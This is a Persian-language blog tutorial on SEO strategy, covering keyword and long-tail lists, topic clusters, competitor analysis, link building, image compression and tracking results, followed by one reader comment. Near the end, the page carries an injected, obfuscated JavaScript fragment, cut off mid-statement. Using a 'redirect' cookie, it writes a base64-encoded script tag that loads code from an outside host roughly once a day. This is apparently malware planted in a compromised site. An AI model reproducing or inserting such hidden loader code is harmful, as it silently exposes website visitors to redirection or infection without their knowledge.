یک دیدگاه
2019/06/11
1352 بازدید

آموزش استراتژی سئو 2021| گام به گام آموزش یک استراتژی عالی

با سلام خدمت همراهان همیشگی ویکی دمی. در این مقاله قصد دارید در مورد استراتژی سئو برای شما صحبت کنیم، زیرا این موضوع بسیار در سئو اهمیت دارد، بنابراین این مقاله را حتماً تا انتها دنبال نمایید. يك موضوع ای كه بين ديجيتال ماركترها وجود دارد اين است كه بهينه سازی موتورهای جستجو يا همان سئو، با گذشته فرق كرده است.

در اينجا بيانيه اي وجود دارد كه ممكن است تا بحال نشنيده باشيد و آن اين است كه “استراتژي سئوي شما براي سال ٢٠١٩ نبايد روي كلمات كليدي متمركز باشد”!

امروزه، اكثر كسب و كارها با مفهوم كلي سئو آشنايي دارند و دليل اهميتش را ميدانند. اما، زماني كه صحبت از توسعه و اجراي استراتژی سئو براي كسب و كار ميشود، توليد محتوا براي كلمات كليدي كه جستجوگران بدنبال آن هستند نه تنها كافي نيست، بلكه دشوار و اشتباه هم هست.

استراتژی سئو چيست؟

استراتژي سئو، فرايند سازماندهي محتواي وبسايت بر اساس عنوان است، كه به موتورهاي جستجو مانند گوگل كمک ميكند تا هدف كاربر را هنگام جستجو درک كنند. شما ميتوانيد با بهينه سازي يک وب پيج بر اساس عنوان ها و كلمات كليدي موجود در عنوان ها، به موتور ها جستجو نشان دهيد كه چقدر متخصص هستيد و براي كلمات كليدي طولاني (سوالاتی که کاربران می پرسند) چقدر خوب مقاله و جواب گذاشته اید.

سئو چيست؟

بهينه سازهاي موتور جستجو (SEO) افرادي هستند كه با بهينه سازي وبسايت ها موجب افزايش ترافيک ارگانيک و جايگاه بالاتر در موتورهاي جستجو ميشوند. در واقع سئوكار، يك استراتژيست محتواي بسيار متخصص است كه با كمک به يک كسب و كار باعث كشف فرصتها ميشود تا از طريق موتورهای جستجو به سوالات مردم درمورد صنعت پاسخ دهد. برای اینکه بطور کامل با سئو آشنا شوید حتماً مقاله آموزش سئو را بخوانید.

در قسمت زير به سه نوع مختلف سئو كه يك سئوكار بايد بر آن تمركز كند، اشاره كرده ايم:

سئوی داخلی:

سئويي است كه روي محتواي “داخل صفحه” و چگونگي بهينه سازي آن  جهت بالا بردن رتبه وبسايت براي كلمات كليدي خاص، تمركز دارد. در مقاله ی آموزش سئو داخلی بطور کامل در مورد نکاتی که در سئو داخلی باید رعایت کنید صحبت کرده ایم.

سئوي خارجي:

سئوی خارجی سئویی است كه روي لينک های هدايت شده به وبسايت، از هركجاي اينترنت، تمركز دارد. (در واقع روي فعاليت هاي خارج سايت متمركز است) تعداد بک لينك ها (هرگونه لينک به صفحه ي شما در صفحات و سايت هاي ديگر)، و پابليشرهايي كه (صفحات يا وبسايت هاي مختلف) كه از طريق اين بک لينك ها به صفحه ي شما متصل هستند، در ايجاد اعتماد يك موتور جستجو تاثيرگذار هستند و باعث بالا رفتن رتبه سايتتان در نتايج جستجو ميشود.

سئوي فني (تكنيكال سئو):

سئويي است كه روي ساختار وبسايت تمركز دارد و با بررسي داخل وبسايت متوجه ميشود كه آيا همه ي صفحات از لحاظ “تكنيكي” درست تنظيم شده اند يا خير. گوگل به همان اندازه كه به محتوای يک وبسايت اهميت ميدهد، به كد آن وبسايت هم اهميت ميدهد. كد همچنين در رتبه بندي وبسايت در موتور جستجو هم بسيار مهم و تاثيرگذار است.

خاطرتان باشد كه همه ی كسب و كارها نميتوانند به يک روش وبسايتشان را بهينه كنند، بنابراين فرايند بهينه سازي سئوها با هم متفاوتند. اين وظيفه ي سئوكار است كه صنعت (industry) مورد نظر را بررسي كند و به درک درستي از موضوعات مهم براي مخاطب برسد تا بتواند با ايجاد استراژی سئو، محتواي مورد نظر مخاطب را برايش فراهم كند.

استراتژی بهینه سازی سئو تکنیکال

آموزش استراتژی تاکتیک های سئو فنی یا آموزش سئو تکنیکال بر خلاف تمام استراتژی های سئو تنها یکبار بر روی وبسایت تنظیم می شوند. در حقیقت پس از پیاده سازی آنها نیاز است هر چند وقت یکبار از نظر بهینه بودن چک و ارزیابی شوند.

 • اتصال وبسایت به حساب گوگل سرچ کنسول
 • بهینه کردن سرعت سایت
 • طراحی سایت خود را ریسپانسیو کنید
 • گواهی SSL را بر روی سایت خود فعال کنید
 • مراقب صفحات 404 و ریدایرکت های وبسایت خود باشید

موارد مهم در استراتژی سئو

در اين قسمت ميخواهيم به ٩ مورد اشاره كنيم كه اولاً در استراتژی سئو بسیار مهم هستند و دوماً با انجام آنها ميتوانيد اطمينان حاصل كنيد كه همه ی موارد بنيادی سئو را مورد پوشش قرار داده ايد. در انتهاي اين مقاله ميتوانيد با دريافت يك الگويي برنامه ريزي شده رايگان بر سئوي داخلي تسلط كامل پيدا كنيد.

 1. تهيه يك ليست از کلمات کلیدی
 2. تهيه يک ليست از كلمات كليدي طولاني بر اساس عناوين
 3. تجزیه و تحلیل سایت رقبا
 4. ساختن صفحه براي هر يک از عناوين
 5. راه اندازي وبلاگ
 6. آپديت كردن وبلاگ براي توسعه اعتبار صفحه
 7. تهيه يک پلن link-building
 8. خلاصه كردن مديا قبل از گذاشتن روی وبسايت
 9. اخبار و روال سئو را روزانه دنبال كنيد
 10. سنجيدن و دنبال كردن نتيجه سئو

1.تهيه لیست کلمات کلیدی

با اينكه كلمات كليدي هنوز هم درقلب سئو هستند، اما ديگر  اولين قدم براي روند پيشرفت ارگانيك آن نيستند. اولين قدم تهيه ي يك ليست از عناويني است كه ميخواهيد طي يك ماه پوشش دهيد. براي شروع يك ليست از حدودا ١٠ واژه كوتاه و terms مرتبط با سرويس و يا محصول مورد نظرتان گردآوري كنيد. با استفاده از ابزار رايگان (Google’s Keyword planner) ميتوانيد حجم جستجوي اين واژه ها را شناسايي كنيد و تغيراتي كه براي كسب و كارتان مناسب است را بيابيد.

شما ميتوانيد از اين كلمات كليدي در عناوينتان استفاده كنيد، اما پست هاي فردي بلاگ را به اين كلمات كليدي اختصاص ندهيد.اگر شما شروع به بهينه سازي وبسايتتان براي جستجو كرده ايد، بايد گفت اين كلمات كليدي براي رتبه بندي در گوگل رقابتي هستند. در اين قسمت خواهيم گفت كه چگونه از عناوين استفاده كنيد.

اگر مبناي مقياستان حجم جستجو و رقابت باشد، بايد تعداد كلمات كليدي كوتاه را به ١٠ الي ١٥ محدود كنيد و فقط آنهايي را نگه داريد كه برايتان اهميت دارند و مخاطبينتان دنبالشان هستند. سپس اين ليست را به ترتيب اولويت بر اساس حجم جستجوي ماهانه و ارتباطش با كسب و كارتان رتبه بندي كنيد.

براي مثال، اگر كسب و كار يك استخر، در تلاش براي رتبه بندی كلمه كليدی “fiberglass pools” باشد- كه ماهانه حدود ١١٠,٠٠٠ جستجو دارد- ، اين كلمه كليدي كوتاه نشانگر عنواني است كه آن كسب و كار ميخواهد درموردش توليد محتوا كند.  سپس كسب و كار،  كلمات كليدي بلندي كه به اين كلمه كليدي كوتاه مرتبط است را تشخيص ميدهد و حجم جستجوي ماهانه را مشخص ميكند و به توضيح در مورد عنوان fiberglass pools (استخرهاي فايبرگلاس) كمك ميكند. در مورد اين كلمات كليدي طولاني در قسمت بعد بيشتر توضيح خواهيم داد.

هركدام از اين كلمات كليدي،”pillar” يا “صفحه مركزي” ناميده ميشوند كه بعنوان پشتيباني اصلي، براي يک “خوشه” ی بزرگتر از كلمات كليدي طولاني، بكار مي آيند. اين دقيقا همان چيزيست كه مارا به گم بعدينان هدايت ميكند.

2.تهيه يك ليست از كلمات كليدي طولاني بر اساس عناوين

در اين قسمت شما شروع به بهينه سازي صفحاتتان براي كلمات كليدي مشخص  ميكنيد. براي هر صفحه مركزي كه شناسايي كرديد، از ابزار كلمه كليدي تان استفاده كنيد تا ٥ الي ١٠ كلمه كليدي طولاني كه عميقا به كلمه كليدي عنوان اصلي مرتبط است شناسايي كنيد.

براي مثال، اگرچه هنوز هم بسيار دشوار است كه با عنوان محبوبي مانند “SEO” به خوبي در گوگل رتبه بندي شد، اما ما همچنان اغلب با همين عنوان توليد محتوا ميكنيم. ما همچنين با ايجاد صفحاتي كه همه بطور مشترك با كلمات كليدي كاملا مشابه و SERP يكسان هدفگذاري ميشوند ، خطر رقابت با محتواي خودمان را به جان ميخريم. بنابراين، ما براي تحقیق کلمات کلیدی، بهینه سازی تصاویر برای موتورهای جستجو، ایجاد استراتژی سئو(که در حال حاضر در حال خواندنش هستيد) و دیگر موضوعات فرعي مربوط به SEO، توليد محتوا ميكنيم.

اين موضوع به كسب و كار فرصت ميدهد تا افرادي كه علايق متفاوت دارند و در مورد محصولاتشان نگران هستند را به خود جذب كند و در نهايت نقاط ورودي بيشتري براي افرادي كه تمايل به خريد دارند ايجاد ميكند.

با استفاده از  زيرموضوع ها ميتوانيد براي وبلاگتان پست تهيه كنيد و يا براي وب پيجتان ايده بگيريد و همچنين مفهوم مشخص راكه در مرحله اول در همه عناوين طولاني شناسايي كرديد، توضيح دهيد. براي شناسايي كلمات كليدي طولاني لازم براي ساختن يك پست براي وبلاگ، اين زيرموضوع ها را به keyword research tool تان بچسبانيد.*

اين زيرموضوع ها باهم يك خوشه توليد ميكنند. بنابراين اگر ١٠ عنوان pillar داشته باشيد، هركدامشان بايد بتوانند يك خوشه از پنج خوشه را ساپورت كنند . به اين مدل سئو “خوشه عنوان” ميگويند، و الگوريتم هاي موتورهاي جستجوي مدرن براي اتصال جستجوگران به چيزي كه به دنبالش ميگردند، كاملاً به همين خوشه ها وابسته هستند.

هرچه محتوايتان خاص تر باشد، نياز مخاطبينتان هم خاص تر است و احتمال اينكه اين ترافيك را به leads) پول) تبديل كنيد بيشتر است. دقيقاً با همين روش گوگل ميتواند وبسايت هاي ارزشمند را پيدا كند. صفحاتي كه روي يك عنوان كلي دقيق تر ميشوند به عنوان بهترين پاسخ براي درخواست جستجوگر در نتايج جستجو ظاهر ميشوند و رتبه بندي بالاتري خواهند داشت.

3.تجزیه و تحلیل سایت رقبا

وجود رقابت در هر حوزه‌ای باعث افزایش هرچه بیشتر رشد، پیشرفت و ترقی آن می‌شود. رقابت در دنیای کسب‌ و کار نیز از جمله رقابت های بسیار حساس و سخت است که باید قبل از ورود به دنیای دیجیتال و حتی قبل از اجرای استراتژی سئو، سایت رقباهای حوزه فعالیت خودتان را بررسی کنید. با بررسی سئوی رقبا و جمع آوری اطلاعات می‌توانید رتبه‌های بهتری را در نتایج جستجو کسب نموده و به رشد و پیشرفت کسب‌وکار خود کمک کنید.

 مراحل بررسی سئوی سایت رقبا

رقبای سئوی خود را شناسایی کنید

اولین گام در بررسی سئوی رقبا این است که بفهمید اصلاً چه رقبایی دارید. به عنوان مثال، به عنوان یک فروشگاه اینترنتی کفش در شهر تهران داشته باشید باید رقبای خود در زمینه فروش کفش در تهران را آنالیز کنید. همچنین اگر برای وبسایت خود وبلاگ راه اندازی کرده باشید هم باید باید مطالب آموزشی بلاگتان هم رقبا تخصصی خود را بررسی کنید تا بتوانید در این مطالب هم رتبه خوبی دریافتن کنید.

 وضعیت سایت رقبا را بررسی کنید

بعد از اینکه رقبای خود را در کلید واژه های اصلی تان شناسایی کردید حالا باید مسائل فنی و وضعیت وبسایت هایشان را بررسی کنید. برای اینکار باید مجموعه ای از چندین شاخص های مختلف را در نظر بگیرید. این نکته را بدانید که با بررسی این شاخص ها میتوانید به نقاط قوت و ضعف رقبا دست یابید و برای پیشرف وبسایتتان یک برنامه عالی بچینید.

 • اعتبار دامنه (Domain authority)
 • عمر دامنه
 • وضعیت ایندکس شدن آن در موتورهای جستجو
 • وضعیت دامنه در دایرکتوری‌های مختلف
 • وضعیت بک لینک
 • رتبه الکسا
 • میزان و حجم ترافیک
 • تعاملات مرتبط در شبکه‌های اجتماعی (Social Signals)

بررسی سئو داخلی وبسایت رقبا

با تحلیل سئوی داخلی رقبا به اطلاعات ارزشمندی دست پیدا خواهید کرد. این اطلاعات میتواند مبنای شروع کار شما برای اقداماتی باشد که قصد دارید روی وبسایت خود پیاده کنید. در بررسی های سئو داخلی یک وبسایت شما باید متوجه شوید که رقیب شما هر چند وقت یک‌بار و چه نوعی از محتوا را منتشر می‌کند، نحوه لینکسازی های داخلی شان چگونه است و کدام کلمات کلیدی را هدف قرار داده است. در این راستا باید به موارد زیر توجه ویژه‌ای داشته باشید:

 • متادیتا (Metadata)
 • استراتژی‌های مربوط به عناوین

در هنگام تحلیل محتوا باید این موارد را بررسی و ارزیابی نمایید:

 •  میزان اعتبار محتوا
 • نوع محتوا و آیتم‌های دیداری و شنیداری مورد استفاده
 • طول ویدئو یا تعداد کلمات
 • عمق مطلب و میزان پرداختن به جزئیات

استراتژی‌های بک لینک رقبا را زیر ذربین قرار دهید

یکی از مهم‌ترین قسمت‌های تحلیل رقابتی و بررسی سئوی رقبا، شناسایی منبع بک‌لینک‌های رقیب و استفاده از این اطلاعات در جهت جذب لینک‌های باکیفیت برای سایت خودتان است. به این منظور لازم است که از ابزارهای تحلیل و آنالیز سئو استفاده کنید. ابزار های مثل ahref و semrush برای آنالیز بک لینک های یک سایت بسیار مناسب هستند.

برای بررسی کامل رقیب هاتان به کمک ابزارهای مختلف پیشنهاد میکنیم آموزش جامع ابزار آنالیز سئو سایت را مطالعه کنید.

بررسی کامل ساختار سایت و کیفیت تجربه کاربری رقبا

اگر وب‌سایت شما نسبت به رقبا کندتر است؛ ریسپانسیو یا واکنشگرا نیست؛ یا اینکه کاربر را گیج می‌کند، باید دست به کار شوید و به دنبال بهبود تجربه کاربران در هنگام استفاده از سایت خود باشید. بررسی سرعت سایت، بهبود صفحات فرود سایت، بررسی خطای 404 و صفحات Orphan Page یا صفحات یتیم و توزیع لینک های داخلی از جمله اقداماتی است با مقایسه سایت رقیب میتوانید به نتایج خوبی برای بهبود ظاهر سایت خود داشته باشید.

4.براي هر عنوان يك صفحه بسازيد

وقتي صحبت از وبسايت ها و و رتبه بندي در موتور جستجو ميشود، تلاش براي رتبه بندي يك صفحه با يك مشت كلمه كليدي غير ممكن است. براي هر يك از ١٠ صفحه مركزي كه در مرحله اول در نظر گرفته بوديد، با استفاده از كلمات كليدي طولاني كه براي خوشه ها در مرحله ي دوم در نظر گرفته بوديد، يك وب پيج بسازيد. براي مثال، يك صفحه مركزي در سئو ميتواند سئو را در بخش هاي مختصري كه تحقيق كلمه كليدي، بهينه سازي تصوير، استراتژي سئو و ساير زيرموضوع ها را معرفي ميكند، توصيف كند. به صفحات مركزي مثل يك محتوا نگاه كنيد جايي كه شما خوانندگان را از زيرموضوع هايي كه در پست هاي بلاگتان توضيح ميدهيد، آگاه ميكنيد.

براي مشخص كردن تعداد صفحه مركزي اي كه بايد بسازيد، از ليست كليدواژه هايتان استفاده كنيد.در نهايت، تعداد موضوع هايي كه برايشان صفحه مركزي ميسازيد بايد با تعداد محصول، پيشنهادات و مكانهاي مختلفي كه كسب و كارتان دارد همخواني داشته باشد. در اينصورت براي مشتري هايتان راحت تر خواهد بود كه شما را بدون توجه به كليد واژه اي كه جستجو ميكنند، پيدا كنند.

براي افزودن تجربه كاربري، همه ي وب پيج ها بايد شامل محتواي مناسب براي مشتري يا مشتري هاي احتمالي، عكس و لينك صفحات بر روي سايت باشند.

در مرحله چهارم در رابطه با اين لينك ها صحبت خواهيم كرد.

  آشنایی با قیمت و تعرفه سئو جهت بهینه سازی سایت ها

5. يک بلاگ بسازيد

بلاگ ساختن ميتواند شيوه ى فوق العاده اى براى بالا آوردن واژه هاى كليديتان باشد و كلى كاربر برايتان جذب ميكند. هرچه باشد، هر پست جديدى كه در بلاگتان ميگذاريد ميتواند در واقع صفحه اى جديد باشد كه بهبود رتبه ى سايتتان در موتورهاى جستجو كمك ميكند. اگر هنوز هم براى كسب و كارتان يك بلگ نداريد، يكى بسازيد. اين دقيقا همانجاييست كه روى هر موضوع زيرشاخه اى ميتوانيد مانور دهيد و واقعا در نتايج گوگل ديده شويد.

همينطور كه پستهاى بلاگتان را مينويسيد و خوشه هاى فضاهاى خاليتان را پر ميكنيد، بايد حواستان به انجام ٣مورد ديگر هم باشد:

بيشتر از سه يا چهار بار از كلمه ى كليدى مخصوص و طولانيتان در هر صفحه استفاده نكنيد. گوگل واقعا مثل قبل به هماهنگى كلمات كليدى اهميتى نميدهد. درواقع، تعداد بالاى كلمه كليدى ها ميتواند يك كارت قرمز برايتان در همه ى موتورهاى جستجو باشد، چون فكر ميكنند كه داريد خودتان را با كلمات كليدى “خفه ميكنيد”. اين موضوع ميتواند باعث جريمه شدن وبسايتتان و در نتيجه پايين آمدن درجه و بد شدن رتبه اش شود.

بعدش، به صفحه ى مركزى كه راجع به اين موضوع از قبل ساخته ايد رجوع كنيد. ميتوانيد اين كار را به شكل تگ در سيستم مديريت محتوايتان(CMS)، يا در بدنه ى متن، به شكل anchor text انجام دهيد.

هرموقع كه يك پست در بلاگتان منتشر كرديد، آن را به صفحه ى مركزى كه زيرموضوعات تان را در بر دارد متصل كنيد. قسمتى كه صفحه ى مركزيتان راجع به زيرموضوع مذكور صحبت ميكند را بيابيد و آدرس را در آن قسمت قرار دهيد.

وقتى هم صفحه ى مركزى و هم خوشه ها را بدين صورت به هم مربوط ميكنيد، درواقع به گوگل اين پيام را ميرسانيد كه بين كلمات كليدى طولانى و موضوعات مجموعه، نوعى رابطه هست و درواقع بدين صورت سعى بر بهتر كردن رتبه تان در همان موضوعات را داريد.

6. هر روز خدا در بلاگتان بنويسيد تا اعتبار صفحه تان بالا برود!

البته هر چيزى هم كه پست ميكنيد لازم نيست به يك خوشه از موضوعات مربوط شود. همچنين به منظور كسب اعتبار براى وبسايتتان از طرف گوگل، نوشتن مباحث مماسى كه مشتريانتان بهشان اهميت ميدهند، ارزشمند خواهد بود. اين كار به گوگل نشان ميدهد كه وقتى به محتوايتان مى افزاييد، بايد درعوض به وبسايت شما اعتبار بيشترى بدهد.

همراه با در نظر داشتن آن موضوع، دست كم هفته اى يک بار دليلى براى بلاگ نويسيتان خلق كنيد. يادتان نرود كه شما اولاً براى مخاطبان خودتان بلاگ نويسى ميكنيد، نه موتورهاى جستجو. در مورد آنچه كه مخاطبانتان و يا رهگذران وبسايتتان به آن علاقه دارند بنويسيد، اطمينان حاصل كنيد كه از كلمات كليدى مرتبط با موضوع هرجا كه مناسب بود استفاده ميكنيد، و مخاطبانتان آرام آرام شروع به ديدن و كليك كردن خواهند كرد.

فراموش نكنيد كه هر موضوع، ميزان اهميتش با ديگرى متفاوت است، و همينطور كه خوشه هاى موضوعاتتان بيشتر ميشود، بايد اولويت هايتان را طبق احتياجات شركتتان بچينيد. بنابراين از صفحات وبى كه دوست داريد بسازيد و رتبه بندى كنيد يک ليست بسازيد. سپس، برنامه اى تريتيب دهيد كه آن صفحات را بسازيد.

ليست اولويتهايتان را طبق راهنمايى هاى پيجهايى كه براى رسيدنتان به هدف هاى بيزينسى ساخته شده اند، به روز كنيد.

7. برنامه اى بچينيد براى لينك سازى

(Cluster SEO) مدل خوشه اى دسته بندى كردن، راه پيشرفت امسال شما در سئوست. اما تنها راه بهبود رتبه ى وبسايتتان اين نيست. پنج قدم اول كه توضيح داديم همگى درباره ى تاكتيك هاى سئوى داخلى بودند. ساختن يك لينك هدف اوليه ى يك سئوى برون صفحه ايست، و همچنين فاكتور بزرگى در چگونگى رتبه بندى صفحه تان توسط موتورهاى جستجوست. حالا ساخت لينك بطور كلى چيست؟ خوب است كه بپرسيم.

كمى وقت روى تفكر بر اينكه چطور ميتوانيد لينكهاى ورودى را به وبسايتتان جذب كنيد بگذاريد. از كوچك شروع كنيد — شايد بخواهيد لينكهايتان را با كسب و كارهاى محلى به اشتراك بگذاريد و در عوض لينكشان را بگيريد. چندتايى پست در بلاگتان بنويسيد و آنها را در توييتر، فيسبوك، Google +، يا LinkedIn هم به اشتراك بگذاريد. سعى كنيدبا ديگر بلاگ نويسها هم در ارتباط باشيد كه هرجا اثرى از شما در بلاگهاى ديگر ديده شد، بر روى وبسايت شما كليك كنند و واردش شوند.

يك روش خوب ديگر براى جذب لينكهاى ورودى، اينست كه يك سرى مطلب راجع به مراسم و اخبار كنونى جهان بنويسيد و پست كنيد. بدين ترتيب خواهيد توانست شانسى ديگر خواهيد داشت براى جذب ورودى از جانب يك industry influencer يا بقيه ى بلاگ نويسان.

ارسال پست مهمان را جدی بگیرید

روش معتبر دیگری که برای به دست آوردن بازدیدکنندگان جدید سایت میتوان پیشنهاد کرد ارسال پست مهمان در وبلاگ‌های مرتبط با حوزه خودتان است. در این روش مطالبی رو منتشر کنید که به وب سایت یا وبلاگ شما پیوند دارند. تولید محتوای باکیفیت، یونیک شرط اول برای ایجاد اثرگذاری این روش در لینک بیلدنیگ سایت شماست. همچنین انتخاب یک وبلاگ معتبر با دامن آتوریتی بالا هم شرط دوم برای دریافت بکلینک های باکیفیت است.

8. همه ى مدياهايتان را قبل از اينكه روى وبسايت بالا ببريد، فشرده سازى كنيد

اين كار قدمى كوچك اما بس مهم در سئوست. درحاليكه بلاگ يا وبسايتتان رشد ميكند، بدون شك تصاوير، ويديو، و مدياهاى مرتبط بيشترى روى آن خواهيد داشت. اين دارايى هاى بصرى ميتوانند توجه بازديدكنندگانتان را بالا ببرند. اما فراموش كردن اينكه همه و همه ى اينها از نظر فنى فايلهاى كامپيوترى هستند — و فايل هم حجم دارد، بسيار ساده است.

به عنوان قانونى كلى، هرچه حجم يك فايل بيشتر باشد، يك جستجوگر اينترنت سخت تر ميتواند وبسايت شما را بالا بياورد. كه صدالبته وقتى موتورهاى جستجو بخواهند تصميم بگيرند محتوايتان را كجا درميان اين رتبه ها قرار دهند، سرعت بالا آمدن يك صفحه از بيشترين اهميت در ميان فاكتور هاى لازم براى رتبه آوردن، برخوردار است.

پس هرچه حجم فايلهايتان كمتر باشد، وبسايتتان زودتر بالا خواهد آمد، و درنتيجه رتبه ى بهترى هم در گوگل خواهيد داشت. ولى اصلاً چطور سايز يك فايل را جمع و جور تر كنيم؟

اگر ميخواهيد عكسى در يك پست روى بلاگتان آپلود كنيد، بطور مثال، اول فايل را از نظر حجمش ارزيابى كنيد. اگر پسوند اندازه اش مگابايت بود، حتى اگر ١مگابايت باشد، خيلى بهتر است كه از يك ابزارى استفاده كنيد كه حجم عكستان را قبل از اينكه رو بلاگتان بارگزارى شود، كمتر كند. سايتهايى مانند TinyPNG خيلى در كم كردن حجم عكس موثرند؟ درحاليكه Squoosh كه از ابزارهاى خود گوگل است، تا اندازه هاى ميكروسكوپى هم حجم تصويرتان را پايين مياورد!

در نهايت، نگه داشتن اندازه ى فايلهايتان در بازه ى كيلوبايت ها، بسيار به بالا رفتن سرعت وبسايتتان كمك خواهد كرد.

هنگام فشرده سازى فايلتان مراقب باشيد و وقتى هم كه فايلتان را دوباره به كامپيوترتان صادر كرديد، اندازه ى واقعى اش را چك كنيد. درحاليكه خيلى از ابزارها در اندازه گيرى حجم فايلها دقيق نيستند، ممكن است خيلى هاى ديگر هم كمى از كيفيت تصاوير را از بين ببرند تا در هرصورت عمل فشرده سازى انجام شود.

از داده های ساختاریافته استفاده کنید

برای ایجاد استراتژی سئو حرفه ای در دراز مدت استفاده از اسکیما یا داده های ساختار یافته برای انواع محتوای صفحات سایتتان است. اکنون بیشتر اطلاعات صفحه اول جستجو در گوگل توسط استراکچردیتا ها نمایش داده می شوند. توجه کنید که برای تمام عناصر محتوایی که در سایت شما وجود دارد میتوانید انواع مختلفی از استراکچردیتا ها را به سایت خود اضافه کنید. با این روش گوگل درک بهتری از محتواهای صفحات شما دارد و خیلی سریع تر و دقیق تر میتواند به کوئری های سرچ شده پاسخ دهد.

  سئو داخلی چیست: آموزش جامع on page seo

9. در جلسات سئو و تمريناتش حضور ثابت داشته باشيد.

مثل هر بازاريابى ديگر، فضاى يك موتور جستجو به سوى بينهايت درحال رشد است. اينكه بخواهيد با همه ى  چيزهاى جديد همراه شويد و همه ى تمرينها را به بهترين شكل انجام دهيد بسيار سخت خواهد بود. اما منابع آنلاين بسيارى وجود دارند كه ميتوانند شما را در همراهى با اخبار و تمرينات سئو يارى كنند و روى وضعيت وبسايتتان و سئويش تاثير مستقيم بگذارند.

اينجا هم تعدادى از منابع را ذكر كرده ايم:

SEOmoz

SEObook

Search Engine Roundtable

Search Engine Land

Diggity Marketing

This Blog

10. حواستان به موفقيت و مفيد واقع شدن محتوايتان باشد.

SEO واقعا ميتواند وقت گير و طاقت فرسا شود. فايده ى اين همه جان كندن، اگر نتوانيد نتيجه اش را ببينيد چيست؟ خيلى از معيارهاى اندازه گيرى هستند كه ميتوانيد روزانه، هفتگى و يا ماهانه پيگيرشان باشيد تا برنامه SEOى خود را پيش ببريد و موفقيتتان را اندازه گيرى كنيد.

به دليل آنكه معيار اندازه گيريتان عبور و مرورهاى سازمانى است (يا همان عبور و مرورى كه يك موتور جست و جوى خاص برايتان مى آورد)، دنبال ابزارى باشيد كه اجازه می دهند شما هم به ردیابی کل تعداد ترافیک سازمانى خود و هم به چگونگى رتبه بندی صفحاتتان تحت هر کلمه کلیدی طولانی شما ميرسيد. SEMrush ابزار گزارشدهی عالی برای این منظور است.

با استفاده از اکسل، Google Sheets یا یک بسته web analytics وب، یک داشبورد ماهانه ایجاد کنید تا بتوانید توسط آن، ميزانى از عبور و مرور وارده بر وبسايتتان كه وابسته به عبور و مرور سازمانى است را زير نظر بگيريد.

همچنین ردیابی صفحات نمایه شده، منافع، ROI، لینکهای ورودی، کلمات کلیدی و رتبه بندی واقعی شما در SERP (صفحات نتایج موتورهای جستجو) می تواند به شما در موفقیت و همچنین شناسایی فرصت های شغلی کمک کند.

امیدواریم از مطالعه این مقاله لذت برده باشید. هر سوالی در مورد استراتژی سئو دارید در بخش نظرات همین مقاله مطرح بفرمایید.

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*
*

دوازده + پانزده =

1

 1. ستاره مرادی

  سلام به ویکی دمی عزیز
  ممنون از این مقاله خیلی خوب
  کلا استراتژي سئو موضوع سختیه و نیاز داره خیلی با دقت پیاده سازی بشه
  واقعا مطلب خوبی بود اما بهتره استراتژی سئو را مقداری تخصصی تر کنید
  مثلا استراتژی محتوا
  و یا استراتژي یک لینک سازی
  یا استراتژی سئو داخلی
  خیلی خوب میشه که این موارد رو هم پوشش بدین.
  و سوالم اینه که یه استراتژی سئو که خوب پیاده بشه بعد از چه مدتی بازخورد خودش رو ایجاد میکنه؟

  03 جولای 2019 پاسخ